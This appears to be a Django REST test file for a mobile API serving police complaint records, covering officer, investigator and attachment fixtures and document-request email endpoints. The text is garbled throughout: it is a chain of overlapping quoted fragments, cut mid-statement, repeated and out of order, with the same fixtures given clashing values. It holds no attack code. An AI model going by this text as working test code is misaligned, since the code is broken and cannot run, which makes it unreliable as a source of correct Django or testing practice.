'4.4000',", "} ] }) def test_retrieve_not_found(self): response = self.client.get(reverse('api-v2:cr-mobile-detail', kwargs={'pk': '45678'})) expect(response.status_code).to.eq(status.HTTP_404_NOT_FOUND) @patch('cr.views.send_attachment_request_email') def", "OfficerAllegationFactory, ComplainantFactory, AreaFactory, PoliceWitnessFactory, InvestigatorFactory, InvestigatorAllegationFactory, AllegationCategoryFactory, AttachmentFileFactory, OfficerBadgeNumberFactory, VictimFactory ) from data.constants", "complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) investigator_3 = OfficerFactory( id=4, first_name='Edward', last_name='May', appointed_date=date(2001,", "APITestCase from rest_framework import status from robber import expect import pytz from data.factories", "a valid email' }) def test_request_document_with_invalid_email(self): AllegationFactory(crid='321') response = self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk': 321}), {'email':", "import MEDIA_TYPE_DOCUMENT from cr.tests.mixins import CRTestCaseMixin from data.cache_managers import officer_cache_manager, allegation_cache_manager from email_service.constants", "'officer_id': 1, 'full_name': '<NAME>', 'badge': 'CPD', 'percentile_allegation': '6.6000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', },", "first_name='Ellis', last_name='Skol', appointed_date=date(2001, 5, 1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) investigator_2 =", "1, 'sustained_count': 1, 'percentile_trr': '5.5000', 'percentile_allegation': '4.4000', } ], 'attachments': [ { 'title':", "'sustained_count': 1, 'percentile_trr': '5.5000', 'percentile_allegation': '4.4000', } ], 'attachments': [ { 'title': 'CR", "from rest_framework import status from robber import expect import pytz from data.factories import", "'7.7000', 'percentile_allegation_internal': '8.8000', }, { 'involved_type': 'police_witness', 'officer_id': 3, 'full_name': '<NAME>', 'allegation_count': 1,", "[ { 'title': 'CR document', 'file_type': 'document', 'url': 'http://cr-document.com/', 'id': '123456', } ]", "'coaccused': [ { 'id': 123, 'full_name': '<NAME>', 'rank': 'Officer', 'final_outcome': 'Separation', 'final_finding': 'Sustained',", "sustained_count=1, ) OfficerAllegationFactory( officer=officer, final_finding='SU', start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False", "'investigator', 'full_name': '<NAME>', 'badge': 'COPA/IPRA', }, { 'involved_type': 'investigator', 'officer_id': 4, 'full_name': '<NAME>',", "OfficerAllegationFactory( officer=officer1, allegation=allegation, final_finding='SU', disciplined=True, final_outcome='Separation', start_date=date(2003, 3, 20), end_date=date(2006, 5, 26), allegation_category=AllegationCategoryFactory(", "tag='TRR', allegation=allegation, title='CR arrest report document', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='AR', allegation=allegation, title='CR", "crid='12345', point=Point(12, 21), incident_date=datetime(2007, 2, 28, tzinfo=pytz.utc), add1=3510, add2='Michigan Ave', city='Chicago', location='Police Communications", "allegation_count=1, sustained_count=1, ) OfficerBadgeNumberFactory(officer=officer1, star='12345', current=True) allegation = AllegationFactory( crid='12345', point=Point(12, 21), incident_date=datetime(2007,", "= InvestigatorFactory(first_name='Kevin', last_name='Osborn') InvestigatorAllegationFactory( allegation=allegation, investigator=investigator, current_star='123456' ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_2, current_star=None )", "AttachmentFileFactory, OfficerBadgeNumberFactory, VictimFactory ) from data.constants import MEDIA_TYPE_DOCUMENT from cr.tests.mixins import CRTestCaseMixin from", "investigator=investigator_3, current_star=None ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_4, current_star=None ) AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR document',", "OfficerBadgeNumberFactory(officer=officer1, star='12345', current=True) allegation = AllegationFactory( crid='12345', point=Point(12, 21), incident_date=datetime(2007, 2, 28, tzinfo=pytz.utc),", "= OfficerFactory( id=123, first_name='Mr', last_name='Foo', gender='M', race='White', rank='Officer', appointed_date=date(2001, 1, 1), birth_year=1993, complaint_percentile=4.4,", ") expect(response.status_code).to.eq(status.HTTP_200_OK) expect(response.data).to.eq({ 'message': 'Thanks for subscribing', 'crid': '112233' }) expect(mock_send_attachment_request_email).to.be.called_once_with( '<EMAIL>', attachment_type='cr_request',", "expect(mock_send_attachment_request_email).to.be.called_once_with( '<EMAIL>', attachment_type='cr_request', pk='112233', ) def test_request_same_document_twice(self): EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST) allegation = AllegationFactory(crid='112233') self.client.post( reverse('api-v2:cr-mobile-request-document',", "InvestigatorFactory(officer=investigator) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator, ) AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR document', id='123456', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT", "'2006-05-26', 'address': '3510 Michigan Ave, Chicago', 'location': 'Police Communications System', 'beat': 'Lincoln Square',", "current=True) allegation = AllegationFactory( crid='12345', point=Point(12, 21), incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), add1=3510, add2='Michigan", "'percentile_allegation_civilian': '1.1000', 'percentile_allegation_internal': '2.2000', 'percentile_trr': '3.3000', } ], 'complainants': [ { 'race': 'Black',", "AreaFactory, PoliceWitnessFactory, InvestigatorFactory, InvestigatorAllegationFactory, AllegationCategoryFactory, AttachmentFileFactory, OfficerBadgeNumberFactory, VictimFactory ) from data.constants import MEDIA_TYPE_DOCUMENT", "allegation=allegation, final_finding='SU', final_outcome='Separation', start_date=date(2003, 3, 20), end_date=date(2006, 5, 26), allegation_category=AllegationCategoryFactory( category='Operation/Personnel Violations', allegation_name='Secondary/Special", "2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False ) PoliceWitnessFactory(officer=officer, allegation=allegation) investigator = OfficerFactory( id=1, first_name='Ellis', last_name='Skol',", "'Secondary/Special Employment' }, 'coaccused': [ { 'id': 123, 'full_name': '<NAME>', 'rank': 'Officer', 'final_outcome':", "OfficerBadgeNumberFactory(officer=officer1, star='12345', current=True) allegation = AllegationFactory( crid='12345', point=Point(12, 21), incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc),", "complaint_percentile=4.4, civilian_allegation_percentile=1.1, internal_allegation_percentile=2.2, trr_percentile=3.3, allegation_count=1, sustained_count=1, ) OfficerBadgeNumberFactory(officer=officer1, star='12345', current=True) allegation = AllegationFactory(", "officer=officer1, allegation=allegation, final_finding='SU', final_outcome='Separation', start_date=date(2003, 3, 20), end_date=date(2006, 5, 26), allegation_category=AllegationCategoryFactory( category='Operation/Personnel Violations',", "}, { 'involved_type': 'investigator', 'officer_id': 1, 'full_name': '<NAME>', 'badge': 'CPD', 'percentile_allegation': '6.6000', 'percentile_allegation_civilian':", "self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': allegation.crid}), {'email': '<EMAIL>'} ) expect(response2.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response2.data).to.eq({ 'message': 'Email already added',", "investigator=investigator, ) AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR document', id='123456', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='TRR',", "valid email' }) def test_request_document_with_invalid_email(self): AllegationFactory(crid='321') response = self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk': 321}), {'email': 'invalid@email'})", "internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) investigator_2 = OfficerFactory( id=2, first_name='Jerome', last_name='Finnigan', appointed_date=date(2001, 5, 1),", "current_star=None ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_3, current_star=None ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_4, current_star=None ) AttachmentFileFactory(", "'Please enter a valid email' }) def test_request_document_with_invalid_allegation(self): response = self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk': 321}))", "[ { 'race': 'Black', 'gender': 'Male', 'age': 18 } ], 'victims': [ {", "import status from robber import expect import pytz from data.factories import ( OfficerFactory,", "28, tzinfo=pytz.utc), allegation__is_officer_complaint=False ) investigator = InvestigatorFactory(officer=investigator) investigator_2 = InvestigatorFactory(officer=investigator_2) investigator_3 = InvestigatorFactory(officer=investigator_3)", "email' }) def test_request_document_with_invalid_email(self): AllegationFactory(crid='321') response = self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk': 321}), {'email': 'invalid@email'}) expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST)", "AllegationFactory( crid='12345', point=Point(12, 21), incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), add1=3510, add2='Michigan Ave', city='Chicago', location='Police", "], 'attachments': [ { 'title': 'CR document', 'file_type': 'document', 'url': 'http://cr-document.com/', 'id': '123456',", "incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), add1=3510, add2='Michigan Ave', city='Chicago', location='Police Communications System', beat=area, is_officer_complaint=False,", "1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) investigator_2 = OfficerFactory( id=2, first_name='Jerome', last_name='Finnigan',", "Point from mock import patch from rest_framework.test import APITestCase from rest_framework import status", "email_service.factories import EmailTemplateFactory class CRMobileViewSetTestCase(CRTestCaseMixin, APITestCase): def test_retrieve(self): area = AreaFactory(name='Lincoln Square') officer1", "reverse('api-v2:cr-mobile-request-document', kwargs={'pk': allegation.crid}), {'email': '<EMAIL>'} ) response2 = self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': allegation.crid}), {'email':", "expect(response2.data).to.eq({ 'message': 'Email already added', 'crid': '112233' }) def test_request_document_without_email(self): AllegationFactory(crid='321') response =", "( OfficerFactory, AllegationFactory, OfficerAllegationFactory, ComplainantFactory, AreaFactory, PoliceWitnessFactory, InvestigatorFactory, InvestigatorAllegationFactory, AllegationCategoryFactory, AttachmentFileFactory, OfficerBadgeNumberFactory, VictimFactory", "{ 'race': 'Black', 'gender': 'Male', 'age': 18 } ], 'victims': [ { 'race':", "investigator = InvestigatorFactory(officer=investigator) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator, ) AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR document', id='123456',", "investigator_4 = InvestigatorFactory(first_name='Kevin', last_name='Osborn') InvestigatorAllegationFactory( allegation=allegation, investigator=investigator, current_star='123456' ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_2, current_star=None", "InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_3, current_star=None ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_4, current_star=None ) AttachmentFileFactory( tag='TRR', allegation=allegation,", "sustained_count=0, ) OfficerAllegationFactory( officer=investigator, final_finding='NS', start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False", "'percentile_allegation_internal': '8.8000', }, { 'involved_type': 'investigator', 'officer_id': 1, 'full_name': '<NAME>', 'badge': 'CPD', 'percentile_allegation':", "Employment' ) ) officer = OfficerFactory( id=3, first_name='Raymond', last_name='Piwinicki', appointed_date=date(2001, 5, 1), complaint_percentile=4.4,", "{'email': '<EMAIL>'} ) expect(response2.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response2.data).to.eq({ 'message': 'Email already added', 'crid': '112233' }) def", "'message': 'Email already added', 'crid': '112233' }) def test_request_document_without_email(self): AllegationFactory(crid='321') response = self.client.post(reverse('api-v2:cr-mobile-request-document',", "def test_request_document_without_email(self): AllegationFactory(crid='321') response = self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk': 321})) expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response.data).to.eq({ 'message': 'Please enter", "patch from rest_framework.test import APITestCase from rest_framework import status from robber import expect", "'officer_id': 3, 'full_name': '<NAME>', 'allegation_count': 1, 'sustained_count': 1, 'percentile_allegation': '9.9000', 'percentile_trr': '5.5000', }", "from django.urls import reverse from django.contrib.gis.geos import Point from mock import patch from", "first_end_date=date(2006, 5, 26) ) ComplainantFactory(allegation=allegation, gender='M', race='Black', age='18') VictimFactory(allegation=allegation, gender='M', race='Black', age=53) OfficerAllegationFactory(", "investigator = OfficerFactory( id=1, first_name='Ellis', last_name='Skol', appointed_date=date(2001, 5, 1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1,", "321}), {'email': 'invalid@email'}) expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response.data).to.eq({ 'message': 'Please enter a valid email' }) def", "appointed_date=date(2001, 5, 1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) investigator_3 = OfficerFactory( id=4,", "allegation = AllegationFactory( crid='12345', point=Point(12, 21), incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), add1=3510, add2='Michigan Ave',", "ComplainantFactory, AreaFactory, PoliceWitnessFactory, InvestigatorFactory, InvestigatorAllegationFactory, AllegationCategoryFactory, AttachmentFileFactory, OfficerBadgeNumberFactory, VictimFactory ) from data.constants import", "from datetime import datetime, date from django.urls import reverse from django.contrib.gis.geos import Point", "'age': 53 } ], 'point': { 'lon': 12.0, 'lat': 21.0 }, 'summary': 'Summary',", "race='Black', age='18') VictimFactory(allegation=allegation, gender='M', race='Black', age=53) OfficerAllegationFactory( officer=officer1, allegation=allegation, final_finding='SU', disciplined=True, final_outcome='Separation', start_date=date(2003,", "report document', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='AR', allegation=allegation, title='CR document 2', id='654321', url='http://AR-document.com/',", "'Please enter a valid email' }) def test_request_document_with_invalid_email(self): AllegationFactory(crid='321') response = self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk':", "'COPA/IPRA', 'percentile_allegation': '9.9000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', }, { 'involved_type': 'investigator', 'officer_id': 2,", "sustained_count=1, ) OfficerBadgeNumberFactory(officer=officer1, star='12345', current=True) allegation = AllegationFactory( crid='12345', point=Point(12, 21), incident_date=datetime(2002, 2,", ") InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_4, current_star=None ) AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR document', id='123456', url='http://cr-document.com/',", "import CRTestCaseMixin from data.cache_managers import officer_cache_manager, allegation_cache_manager from email_service.constants import CR_ATTACHMENT_REQUEST from email_service.factories", "star='12345', current=True) allegation = AllegationFactory( crid='12345', point=Point(12, 21), incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), add1=3510,", "'CR document', 'file_type': 'document', 'url': 'http://cr-document.com/', 'id': '123456', } ] }) def test_retrieve_badge(self):", "appointed_date=date(2001, 5, 1), complaint_percentile=9.9, trr_percentile=5.5, allegation_count=1, sustained_count=1, ) OfficerAllegationFactory( officer=officer, final_finding='SU', start_date=date(2003, 2,", "AllegationFactory(crid='321') response = self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk': 321})) expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response.data).to.eq({ 'message': 'Please enter a valid", "InvestigatorFactory, InvestigatorAllegationFactory, AllegationCategoryFactory, AttachmentFileFactory, OfficerBadgeNumberFactory, VictimFactory ) from data.constants import MEDIA_TYPE_DOCUMENT from cr.tests.mixins", "gender='M', race='Black', age=53) OfficerAllegationFactory( officer=officer1, allegation=allegation, final_finding='SU', disciplined=True, final_outcome='Separation', start_date=date(2003, 3, 20), end_date=date(2006,", "age='18') VictimFactory(allegation=allegation, gender='M', race='Black', age=53) OfficerAllegationFactory( officer=officer1, allegation=allegation, final_finding='SU', final_outcome='Separation', start_date=date(2003, 3, 20),", "Violations', 'allegation_name': 'Secondary/Special Employment' }, 'coaccused': [ { 'id': 123, 'full_name': '<NAME>', 'rank':", "'full_name': '<NAME>', 'allegation_count': 1, 'sustained_count': 1, 'percentile_allegation': '9.9000', 'percentile_trr': '5.5000', } ], 'attachments':", "20), first_end_date=date(2006, 5, 26) ) ComplainantFactory(allegation=allegation, gender='M', race='Black', age='18') VictimFactory(allegation=allegation, gender='M', race='Black', age=53)", "EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST) allegation = AllegationFactory(crid='112233') self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': allegation.crid}), {'email': '<EMAIL>'} ) response2 =", "'involved_type': 'investigator', 'officer_id': 1, 'full_name': '<NAME>', 'badge': 'CPD', 'percentile_allegation': '6.6000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal':", "expect(response.data).to.eq({ 'message': 'Please enter a valid email' }) def test_request_document_with_invalid_allegation(self): response = self.client.post(reverse('api-v2:cr-mobile-request-document',", "tag='TRR', allegation=allegation, title='CR document', id='123456', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='AR', allegation=allegation, title='CR document", "28), allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False ) investigator = InvestigatorFactory(officer=investigator) investigator_2 = InvestigatorFactory(officer=investigator_2)", "'involvements': [ { 'involved_type': 'investigator', 'full_name': '<NAME>', 'badge': 'COPA/IPRA', }, { 'involved_type': 'investigator',", "summary='Summary', first_start_date=date(2003, 3, 20), first_end_date=date(2006, 5, 26) ) ComplainantFactory(allegation=allegation, gender='M', race='Black', age='18') VictimFactory(allegation=allegation,", "1), complaint_percentile=9.9, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) OfficerBadgeNumberFactory(officer=investigator_2, star='456789', current=True) OfficerAllegationFactory( officer=investigator, final_finding='NS',", "= InvestigatorFactory(officer=investigator) investigator_2 = InvestigatorFactory(officer=investigator_2) investigator_3 = InvestigatorFactory(officer=investigator_3) investigator_4 = InvestigatorFactory(first_name='Kevin', last_name='Osborn') InvestigatorAllegationFactory(", "id=1, first_name='Ellis', last_name='Skol', appointed_date=date(2001, 5, 1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) investigator_2", "from email_service.factories import EmailTemplateFactory class CRMobileViewSetTestCase(CRTestCaseMixin, APITestCase): def test_retrieve(self): area = AreaFactory(name='Lincoln Square')", "race='White', rank='Officer', appointed_date=date(2001, 1, 1), birth_year=1993, complaint_percentile=4.4, civilian_allegation_percentile=1.1, internal_allegation_percentile=2.2, trr_percentile=3.3, allegation_count=1, sustained_count=1, )", "response = self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk': 321}), {'email': 'invalid@email'}) expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response.data).to.eq({ 'message': 'Please enter a", "add1=3510, add2='Michigan Ave', city='Chicago', location='Police Communications System', beat=area, is_officer_complaint=False, summary='Summary', first_start_date=date(2003, 3, 20),", "InvestigatorAllegationFactory( allegation=allegation, investigator=investigator, ) AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR document', id='123456', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT )", "last_name='May', appointed_date=date(2001, 5, 1), complaint_percentile=9.9, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) OfficerBadgeNumberFactory(officer=investigator_2, star='456789', current=True)", "civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) OfficerAllegationFactory( officer=investigator, final_finding='NS', start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002, 2,", "'112233' }) expect(mock_send_attachment_request_email).to.be.called_once_with( '<EMAIL>', attachment_type='cr_request', pk='112233', ) def test_request_same_document_twice(self): EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST) allegation = AllegationFactory(crid='112233')", "kwargs={'pk': allegation.crid}), {'email': '<EMAIL>'} ) expect(response2.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response2.data).to.eq({ 'message': 'Email already added', 'crid': '112233'", "final_finding='SU', disciplined=True, final_outcome='Separation', start_date=date(2003, 3, 20), end_date=date(2006, 5, 26), allegation_category=AllegationCategoryFactory( category='Operation/Personnel Violations', allegation_name='Secondary/Special", "System', beat=area, is_officer_complaint=False, summary='Summary', first_start_date=date(2003, 3, 20), first_end_date=date(2006, 5, 26) ) ComplainantFactory(allegation=allegation, gender='M',", "OfficerAllegationFactory( officer=officer, final_finding='SU', start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False ) PoliceWitnessFactory(officer=officer,", "2, 'full_name': '<NAME>', 'badge': 'CPD', 'percentile_allegation': '6.6000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', }, {", "id=123, first_name='Mr', last_name='Foo', gender='M', race='White', rank='Officer', appointed_date=date(2001, 1, 1), birth_year=1993, complaint_percentile=4.4, civilian_allegation_percentile=1.1, internal_allegation_percentile=2.2,", "1), complaint_percentile=4.4, trr_percentile=5.5, allegation_count=1, sustained_count=1, ) OfficerAllegationFactory( officer=officer, final_finding='SU', start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002,", "kwargs={'pk': '45678'})) expect(response.status_code).to.eq(status.HTTP_404_NOT_FOUND) @patch('cr.views.send_attachment_request_email') def test_request_document(self, mock_send_attachment_request_email): EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST) AllegationFactory(crid='112233') response = self.client.post( reverse('api-v2:cr-mobile-request-document',", "location='Police Communications System', beat=area, is_officer_complaint=False, summary='Summary', first_start_date=date(2003, 3, 20), first_end_date=date(2006, 5, 26) )", "'involved_type': 'investigator', 'full_name': '<NAME>', 'badge': 'COPA/IPRA', }, { 'involved_type': 'investigator', 'officer_id': 4, 'full_name':", "'4.4000', 'percentile_allegation_civilian': '1.1000', 'percentile_allegation_internal': '2.2000', 'percentile_trr': '3.3000', } ], 'complainants': [ { 'race':", "'involved_type': 'police_witness', 'officer_id': 3, 'full_name': '<NAME>', 'allegation_count': 1, 'sustained_count': 1, 'percentile_allegation': '9.9000', 'percentile_trr':", "2, 28), allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False ) PoliceWitnessFactory(officer=officer, allegation=allegation) investigator = OfficerFactory(", "AllegationFactory(crid='112233') response = self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': '112233'}), {'email': '<EMAIL>'} ) expect(response.status_code).to.eq(status.HTTP_200_OK) expect(response.data).to.eq({ 'message':", "} ], 'attachments': [ { 'title': 'CR document', 'file_type': 'document', 'url': 'http://cr-document.com/', 'id':", "data.factories import ( OfficerFactory, AllegationFactory, OfficerAllegationFactory, ComplainantFactory, AreaFactory, PoliceWitnessFactory, InvestigatorFactory, InvestigatorAllegationFactory, AllegationCategoryFactory, AttachmentFileFactory,", "race='Black', age=53) OfficerAllegationFactory( officer=officer1, allegation=allegation, final_finding='SU', final_outcome='Separation', start_date=date(2003, 3, 20), end_date=date(2006, 5, 26),", "OfficerFactory( id=123, first_name='Mr', last_name='Foo', gender='M', race='White', rank='Officer', appointed_date=date(2001, 1, 1), birth_year=1993, complaint_percentile=4.4, civilian_allegation_percentile=1.1,", "appointed_date=date(2001, 5, 1), complaint_percentile=9.9, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) OfficerBadgeNumberFactory(officer=investigator_2, star='456789', current=True) OfficerAllegationFactory(", "OfficerFactory( id=3, first_name='Raymond', last_name='Piwinicki', appointed_date=date(2001, 5, 1), complaint_percentile=4.4, trr_percentile=5.5, allegation_count=1, sustained_count=1, ) OfficerAllegationFactory(", "'Operation/Personnel Violations', 'allegation_name': 'Secondary/Special Employment' }, 'coaccused': [ { 'id': 123, 'full_name': '<NAME>',", "'2007-02-28', 'start_date': '2003-03-20', 'end_date': '2006-05-26', 'address': '3510 Michigan Ave, Chicago', 'location': 'Police Communications", "def test_retrieve_not_found(self): response = self.client.get(reverse('api-v2:cr-mobile-detail', kwargs={'pk': '45678'})) expect(response.status_code).to.eq(status.HTTP_404_NOT_FOUND) @patch('cr.views.send_attachment_request_email') def test_request_document(self, mock_send_attachment_request_email): EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST)", "kwargs={'pk': 321})) expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response.data).to.eq({ 'message': 'Please enter a valid email' }) def test_request_document_with_invalid_email(self):", "is_officer_complaint=False, summary='Summary', first_start_date=date(2003, 3, 20), first_end_date=date(2006, 5, 26) ) ComplainantFactory(allegation=allegation, gender='M', race='Black', age='18')", "'Police Communications System', 'beat': 'Lincoln Square', 'involvements': [ { 'involved_type': 'investigator', 'officer_id': 1,", "21), incident_date=datetime(2007, 2, 28, tzinfo=pytz.utc), add1=3510, add2='Michigan Ave', city='Chicago', location='Police Communications System', beat=area,", "id='123456', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR arrest report document', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT", "internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) investigator_3 = OfficerFactory( id=4, first_name='Edward', last_name='May', appointed_date=date(2001, 5, 1),", "'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', }, { 'involved_type': 'investigator', 'officer_id': 2, 'full_name': '<NAME>', 'badge':", "allegation.crid}), {'email': '<EMAIL>'} ) response2 = self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': allegation.crid}), {'email': '<EMAIL>'} )", "datetime, date from django.urls import reverse from django.contrib.gis.geos import Point from mock import", "'<EMAIL>', attachment_type='cr_request', pk='112233', ) def test_request_same_document_twice(self): EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST) allegation = AllegationFactory(crid='112233') self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk':", "final_finding='SU', final_outcome='Separation', start_date=date(2003, 3, 20), end_date=date(2006, 5, 26), allegation_category=AllegationCategoryFactory( category='Operation/Personnel Violations', allegation_name='Secondary/Special Employment'", "id=3, first_name='Raymond', last_name='Piwinicki', appointed_date=date(2001, 5, 1), complaint_percentile=4.4, trr_percentile=5.5, allegation_count=1, sustained_count=1, ) OfficerAllegationFactory( officer=officer,", "= InvestigatorFactory(officer=investigator_2) investigator_3 = InvestigatorFactory(officer=investigator_3) investigator_4 = InvestigatorFactory(first_name='Kevin', last_name='Osborn') InvestigatorAllegationFactory( allegation=allegation, investigator=investigator, current_star='123456'", "12.0, 'lat': 21.0 }, 'summary': 'Summary', 'incident_date': '2007-02-28', 'start_date': '2003-03-20', 'end_date': '2006-05-26', 'address':", "investigator = InvestigatorFactory(officer=investigator) investigator_2 = InvestigatorFactory(officer=investigator_2) investigator_3 = InvestigatorFactory(officer=investigator_3) investigator_4 = InvestigatorFactory(first_name='Kevin', last_name='Osborn')", "'Lincoln Square', 'involvements': [ { 'involved_type': 'investigator', 'full_name': '<NAME>', 'badge': 'COPA/IPRA', }, {", "'category': 'Operation/Personnel Violations', 'allegation_name': 'Secondary/Special Employment' }, 'coaccused': [ { 'id': 123, 'full_name':", "'rank': 'Officer', 'final_outcome': 'Separation', 'final_finding': 'Sustained', 'allegation_count': 1, 'category': 'Operation/Personnel Violations', 'percentile_allegation': '4.4000',", "test_retrieve_not_found(self): response = self.client.get(reverse('api-v2:cr-mobile-detail', kwargs={'pk': '45678'})) expect(response.status_code).to.eq(status.HTTP_404_NOT_FOUND) @patch('cr.views.send_attachment_request_email') def test_request_document(self, mock_send_attachment_request_email): EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST) AllegationFactory(crid='112233')", ") ) officer = OfficerFactory( id=3, first_name='Raymond', last_name='Piwinicki', appointed_date=date(2001, 5, 1), complaint_percentile=9.9, trr_percentile=5.5,", "self.client.get(reverse('api-v2:cr-mobile-detail', kwargs={'pk': '45678'})) expect(response.status_code).to.eq(status.HTTP_404_NOT_FOUND) @patch('cr.views.send_attachment_request_email') def test_request_document(self, mock_send_attachment_request_email): EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST) AllegationFactory(crid='112233') response = self.client.post(", "= self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk': 321}), {'email': 'invalid@email'}) expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response.data).to.eq({ 'message': 'Please enter a valid", "'url': 'http://cr-document.com/', 'id': '123456', } ] }) def test_retrieve_badge(self): area = AreaFactory(name='Lincoln Square')", "OfficerAllegationFactory( officer=investigator, final_finding='NS', start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False ) investigator", ") officer = OfficerFactory( id=3, first_name='Raymond', last_name='Piwinicki', appointed_date=date(2001, 5, 1), complaint_percentile=9.9, trr_percentile=5.5, allegation_count=1,", "3, 20), end_date=date(2006, 5, 26), allegation_category=AllegationCategoryFactory( category='Operation/Personnel Violations', allegation_name='Secondary/Special Employment' ) ) officer", "5, 1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) investigator_2 = OfficerFactory( id=2, first_name='Jerome',", "last_name='Piwinicki', appointed_date=date(2001, 5, 1), complaint_percentile=9.9, trr_percentile=5.5, allegation_count=1, sustained_count=1, ) OfficerAllegationFactory( officer=officer, final_finding='SU', start_date=date(2003,", "EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST) 